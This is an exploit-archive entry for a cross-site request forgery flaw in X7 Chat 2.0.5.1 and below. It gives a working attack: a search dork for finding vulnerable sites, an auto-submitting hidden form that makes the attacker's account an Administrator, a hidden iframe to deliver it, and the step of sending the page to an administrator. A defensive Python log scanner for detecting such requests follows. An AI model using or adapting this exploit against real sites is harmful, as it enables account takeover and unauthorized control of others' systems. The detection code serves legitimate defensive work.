
X7 Chat 2.0.5.1 Cross Site Request Forgery

Posted May 9, 2012
Authored by DennSpec

X7 Chat versions 2.0.5.1 and below suffer from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 5a6c30045da825b60c8631b4e54c65d985928c2498b1dc1768c3aaa8458e6b85

# Exploit Title: X7 Chat 2.0.5.1 CSRF Add Admin Exploit
# Google Dork: intitle:"Chat Room" "Powered By X7 Chat 2.0.5"
# Date: 09.05.2012
# Author: DennSpec
# Software Link: http://x7chat.com/releases/v2/x7chat2_0_5_1.zip
# Version: <= 2.0.5.1

First, register an account and choose a username.

(frame.html, placed in the same path as your main HTML page)

<html>
<body onload="document.xform.submit();">
<form name="xform" action="http://xxxxxxxxx.com/x7path/index.php?act=adminpanel&cp_page=users&update=YOURUSERNAME" method="post">
<input type="hidden" name="username" value="YOURUSERNAME" />
<input type="hidden" name="usergroup" value="Administrator" />
</form>
</body>
</html>

Replace http://xxxxxxxxx.com/x7path/ with your target URL, and replace YOURUSERNAME with your username.

Add this code inside the body tag of the main HTML page:
<iframe style="display:none;" src="frame.html"></iframe>

Then upload the main page and frame.html, and send the main page URL to any administrator.
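
A defender-side check for the request this advisory describes, as an added example that is not part of the original advisory: it scans web server access logs (combined log format assumed) for POSTs to the admin-panel user update URL and classifies each by Referer host. The host name chat.example.org, the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip ident user [time] "METHOD target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def classify(line, site_host):
    """Return None for unrelated lines, else a verdict for a POST to the
    admin-panel user update action named in the advisory."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    url = urlsplit(m["target"])
    q = parse_qs(url.query)
    if not url.path.endswith("/index.php") or "update" not in q:
        return None
    if q.get("act") != ["adminpanel"] or q.get("cp_page") != ["users"]:
        return None
    ref_host = urlsplit(m["referer"]).hostname  # None when Referer is "-" or empty
    if ref_host is None:
        verdict = "review"      # Referer stripped: inconclusive, check by hand
    elif ref_host == site_host.lower():
        verdict = "same-site"   # submitted from the chat's own pages
    else:
        verdict = "cross-site"  # form was submitted from another origin
    return {"ip": m["ip"], "time": m["time"], "updated_user": q["update"][0],
            "referer_host": ref_host, "verdict": verdict}

def scan(lines, site_host):
    """Classify every matching line in an iterable of log lines."""
    return [hit for hit in (classify(l.rstrip("\n"), site_host) for l in lines) if hit]

# Constructed sample log lines (not from a real server); hosts are placeholders.
_P = "/x7path/index.php?act=adminpanel&cp_page=users"
SAMPLE = [
    f'203.0.113.7 - - [09/May/2012:10:01:12 +0000] "POST {_P}&update=alice HTTP/1.1" 200 5120 "http://chat.example.org{_P}" "Mozilla/5.0"',
    f'203.0.113.7 - - [09/May/2012:10:05:40 +0000] "POST {_P}&update=newuser1 HTTP/1.1" 200 5120 "http://pages.example.net/frame.html" "Mozilla/5.0"',
    '198.51.100.9 - - [09/May/2012:10:06:02 +0000] "GET /x7path/index.php?act=frame HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    f'203.0.113.7 - - [09/May/2012:10:09:31 +0000] "POST {_P}&update=bob HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE, "chat.example.org"):
        print(hit)
```

A cross-site hit followed by the named user appearing in the Administrator group is worth investigating; a missing Referer is inconclusive because browsers and proxies can strip it.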
